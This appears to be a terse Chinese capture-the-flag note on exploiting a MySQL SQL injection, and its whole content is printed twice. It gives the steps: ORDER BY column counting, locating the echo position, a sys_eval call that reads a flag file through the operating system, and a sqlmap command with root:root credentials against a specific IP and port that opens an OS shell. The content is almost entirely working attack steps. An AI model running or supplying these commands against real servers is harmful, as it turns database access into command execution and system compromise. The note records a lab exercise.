我们知道此处有注入 使用order by 确定他的字段值
order by 得出 字段值是7
判断出来回显位数是4
Select version()
Select sys_eval(‘cat/flag。txt’)
sqlmap -d “mysql://root:root@159.75.16.25:3309/mysql” --os-shell
我们知道此处有注入 使用order by 确定他的字段值
order by 得出 字段值是7
判断出来回显位数是4
Select version()
Select sys_eval(‘cat/flag。txt’)
sqlmap -d “mysql://root:root@159.75.16.25:3309/mysql” --os-shell